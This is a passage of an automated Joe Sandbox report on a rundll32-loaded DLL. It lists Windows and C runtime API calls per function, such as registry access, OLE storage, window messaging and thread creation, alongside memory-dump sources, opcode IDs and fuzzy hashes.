                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                          • _memset.LIBCMT ref: 10020AE2
                                                                                                                          • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1891723912-0
                                                                                                                          • Opcode ID: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                          • Instruction ID: bbf58174ed8a80918add6c1c4d28f9e8b2dc0fc786f447701b2046db94720ece
                                                                                                                          • Opcode Fuzzy Hash: c202fd39cbfffff3bf24e4dfcb1fdac57d085034b58585143c8170edaa30a227
                                                                                                                          • Instruction Fuzzy Hash: F2319874500716EFD720DF10EC85D5EBBA2EF04310BA1C529F91A9A662DB30B990CB81
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 10025BAC
                                                                                                                            • Part of subcall function 1002426A: SysStringLen.OLEAUT32(?), ref: 10024272
                                                                                                                            • Part of subcall function 1002426A: CoGetClassObject.OLE32(?,?,00000000,1004B62C,?), ref: 10024290
                                                                                                                          • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 10025D36
                                                                                                                          • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 10025D57
                                                                                                                          • GlobalAlloc.KERNEL32(00000000,00000000), ref: 10025DA4
                                                                                                                          • GlobalLock.KERNEL32 ref: 10025DB2
                                                                                                                          • GlobalUnlock.KERNEL32(?), ref: 10025DCA
                                                                                                                          • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10025DED
                                                                                                                          • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10025E09
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 317715441-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GlobalLock.KERNEL32 ref: 10014A3F
                                                                                                                          • lstrcmpA.KERNEL32(?,?), ref: 10014A4B
                                                                                                                          • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10014A5D
                                                                                                                          • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A7D
                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A85
                                                                                                                          • GlobalLock.KERNEL32 ref: 10014A8F
                                                                                                                          • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10014A9C
                                                                                                                          • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10014AB4
                                                                                                                            • Part of subcall function 10020495: GlobalFlags.KERNEL32(?), ref: 100204A0
                                                                                                                            • Part of subcall function 10020495: GlobalUnlock.KERNEL32(?,?,?,10014801,?,00000004,1000116F,?,?,1000113F), ref: 100204B2
                                                                                                                            • Part of subcall function 10020495: GlobalFree.KERNEL32(?), ref: 100204BD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 168474834-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetSystemMetrics.USER32 ref: 10020F3B
                                                                                                                          • GetSystemMetrics.USER32 ref: 10020F42
                                                                                                                          • GetSystemMetrics.USER32 ref: 10020F49
                                                                                                                          • GetSystemMetrics.USER32 ref: 10020F53
                                                                                                                          • GetDC.USER32(00000000), ref: 10020F5D
                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 10020F6E
                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020F76
                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 10020F7E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1151147025-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 10018224
                                                                                                                          • MapDialogRect.USER32(?,00000000), ref: 100182B5
                                                                                                                          • SysAllocStringLen.OLEAUT32(?,?), ref: 100182D4
                                                                                                                          • CLSIDFromString.OLE32(?,?), ref: 100183C6
                                                                                                                            • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                          • CLSIDFromProgID.OLE32(?,?), ref: 100183CE
                                                                                                                          • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 10018468
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 100184BA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2841959276-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 10029D39
                                                                                                                          • _memset.LIBCMT ref: 10029DA5
                                                                                                                            • Part of subcall function 1002BDD9: _memset.LIBCMT ref: 1002BDE1
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 10029DE5
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 10029E66
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 10029E75
                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 10029E84
                                                                                                                          • VariantClear.OLEAUT32(00000000), ref: 10029E99
                                                                                                                            • Part of subcall function 1002981B: __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                            • Part of subcall function 1002981B: VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                            • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2905758408-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3574576181-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 1001658F
                                                                                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1001664B
                                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10016662
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 1001667C
                                                                                                                          • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1001668E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                          • String ID: Software\
                                                                                                                          • API String ID: 3878845136-964853688
                                                                                                                          • Opcode ID: f1b56214fd335d4f9116c0b783ab986839370396de21831478769312653865ef
                                                                                                                          • Instruction ID: 033a50cfb30fa6cc3e6a93964c888ed0270874f81604230ed873c3433942879c
                                                                                                                          • Opcode Fuzzy Hash: f1b56214fd335d4f9116c0b783ab986839370396de21831478769312653865ef
                                                                                                                          • Instruction Fuzzy Hash: EB41BD3590021ADBDF11DBA4CC85AEFB7F9EF49300F10452AF551E7290DB74AA84CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetParent.USER32(?), ref: 1001AC38
                                                                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AC5F
                                                                                                                          • UpdateWindow.USER32 ref: 1001AC79
                                                                                                                          • SendMessageA.USER32 ref: 1001AC9D
                                                                                                                          • SendMessageA.USER32 ref: 1001ACB7
                                                                                                                          • UpdateWindow.USER32 ref: 1001ACFD
                                                                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AD31
                                                                                                                            • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2853195852-0
                                                                                                                          • Opcode ID: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                          • Instruction ID: 2c496a546f4f3369c4007c2120619f6f6246382fa3c8875764faf214921a126d
                                                                                                                          • Opcode Fuzzy Hash: 8feb0ac7bae7ce442b8f735e4586b594c24fd72a806b3adb2c8abbd7d5165037
                                                                                                                          • Instruction Fuzzy Hash: CF419C306047419FD721DF218D84A1BBAE4FFC6B95F00092DF8829A5A1E772D9C4CA92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3219385341-0
                                                                                                                          • Opcode ID: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                          • Instruction ID: 62284d7f9b5d477bd881e5ff36e2f7527576b9e0115aa241cae08abffcb520cf
                                                                                                                          • Opcode Fuzzy Hash: 0692041214081e2f36a8d4241324024d2ae50e87aeefd30631ef423bb921d550
                                                                                                                          • Instruction Fuzzy Hash: B2314975301315EFDA11DB64ECC4D6F7AEEEB866C1B530469F840DB112DB31EC8196A2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetWindow.USER32(?,00000002), ref: 1002A21B
                                                                                                                          • GetParent.USER32(?), ref: 1002A22C
                                                                                                                          • GetWindow.USER32(?,00000002), ref: 1002A24F
                                                                                                                          • GetWindow.USER32(?,00000002), ref: 1002A261
                                                                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 1002A270
                                                                                                                          • IsWindowVisible.USER32(?), ref: 1002A28A
                                                                                                                          • GetTopWindow.USER32(?), ref: 1002A2B0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$LongParentVisible
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 506644340-0
                                                                                                                          • Opcode ID: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                          • Instruction ID: 0686fc7eee0d828e519c8ddef4b664d273c3d3866c12363d81ce6f3f8585b441
                                                                                                                          • Opcode Fuzzy Hash: 4c680b8172efdff4f43197e84ba51ed07d499ac862c14e8ee8a7a782e640ae8a
                                                                                                                          • Instruction Fuzzy Hash: 8D219532A00B25EBD621EBB99C49F1B76DCFF8A790F810514F991EB152DF26EC848750
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • ___set_flsgetvalue.LIBCMT ref: 10032AB8
                                                                                                                          • __calloc_crt.LIBCMT ref: 10032AC4
                                                                                                                          • CreateThread.KERNEL32(00000002,?,V&',00000000,?,1001623D), ref: 10032B08
                                                                                                                          • GetLastError.KERNEL32(?,1001623D,?,?,100160A8,?,00000002,00000030,?,00000000), ref: 10032B12
                                                                                                                          • __dosmaperr.LIBCMT ref: 10032B2A
                                                                                                                            • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                            • Part of subcall function 10037753: __decode_pointer.LIBCMT ref: 1003775C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
                                                                                                                          • String ID: V&'
                                                                                                                          • API String ID: 1067611704-802299783
                                                                                                                          • Opcode ID: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                          • Instruction ID: 55a26fe1f49629ebb029cc0f5307a0876855c5a2f29d8e6ee061ec31c14b4724
                                                                                                                          • Opcode Fuzzy Hash: 7692696f047afdf50ec9d72e30f89faf206a335569b9867b5efcd1348c4cc88e
                                                                                                                          • Instruction Fuzzy Hash: 28112376505205EFDB02EFA4DC8288FBBE8FF08366F210429F501DA061EB31A910CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10016C9F: _memset.LIBCMT ref: 10016CB6
                                                                                                                          • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013DA
                                                                                                                          • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013EC
                                                                                                                          • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013FE
                                                                                                                          • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001410
                                                                                                                          • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001422
                                                                                                                          • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001446
                                                                                                                          • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001458
                                                                                                                            • Part of subcall function 100136C0: LoadIconA.USER32 ref: 100136D2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ProcessorVirtual$Concurrency::RootRoot::$IconLoad_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2004563703-0
                                                                                                                          • Opcode ID: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                          • Instruction ID: cb42d3b07606be4c321c66a21cc03232491b7df8b22d3b1298026f5f2f4788d5
                                                                                                                          • Opcode Fuzzy Hash: 6dfda32c90deb5612abc77854e0b58487ec939f19a89b76ccee82452222fe2ce
                                                                                                                          • Instruction Fuzzy Hash: 1A216DB4904299EBDB04CBA8C951BAEBB75FF05704F148558E4516B3C2CB79AA00CB65
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10017660
                                                                                                                          • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10017683
                                                                                                                          • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001769F
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 100176AF
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 100176B9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreate$Open
                                                                                                                          • String ID: software
                                                                                                                          • API String ID: 1740278721-2010147023
                                                                                                                          • Opcode ID: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                          • Instruction ID: 0cbbb75e8a23424455f11a5bf93a60ebfd6ed3f7897ef2d174d7de764d8d358b
                                                                                                                          • Opcode Fuzzy Hash: f07ad67f425876aa3b9c3d1abad745f5130b44368e02ee1c7008248ac9000b61
                                                                                                                          • Instruction Fuzzy Hash: E911C576900169FBDB21DB9ACD88CDFBFBCEF8A740B1040AAE504E2121D3719A55DB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • ~_Task_impl.LIBCPMT ref: 100011B6
                                                                                                                            • Part of subcall function 10018A6F: __EH_prolog3.LIBCMT ref: 10018A76
                                                                                                                          • ~_Task_impl.LIBCPMT ref: 100011C8
                                                                                                                          • ~_Task_impl.LIBCPMT ref: 100011EC
                                                                                                                            • Part of subcall function 10018AC4: __EH_prolog3.LIBCMT ref: 10018ACB
                                                                                                                          • ~_Task_impl.LIBCPMT ref: 100011FE
                                                                                                                          • ~_Task_impl.LIBCPMT ref: 10001210
                                                                                                                          • ~_Task_impl.LIBCPMT ref: 10001222
                                                                                                                          • ~_Task_impl.LIBCPMT ref: 10001231
                                                                                                                            • Part of subcall function 10018662: __EH_prolog3.LIBCMT ref: 10018669
                                                                                                                            • Part of subcall function 10016C14: __EH_prolog3.LIBCMT ref: 10016C1B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Task_impl$H_prolog3
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1204490572-0
                                                                                                                          • Opcode ID: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
                                                                                                                          • Instruction ID: 6e4cb6b4a122521f521244997ac3fe4936e5f385243ec76687bf906466ac38b5
                                                                                                                          • Opcode Fuzzy Hash: 10d967965786d9dd3e33bfeddf35d30d57af0e4a65215ad2dc6e6a32aea05cb1
                                                                                                                          • Instruction Fuzzy Hash: 6B215970905189DBEF09DB98C860BBEBB75EF01308F18469DE0526B3C2CB392B00C716
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 10020A95
                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10020A9F
                                                                                                                            • Part of subcall function 10033135: RaiseException.KERNEL32(?,?,?,?), ref: 10033175
                                                                                                                          • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004), ref: 10020AB6
                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                            • Part of subcall function 100201BD: __CxxThrowException@8.LIBCMT ref: 100201D1
                                                                                                                          • _memset.LIBCMT ref: 10020AE2
                                                                                                                          • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                          • String ID:
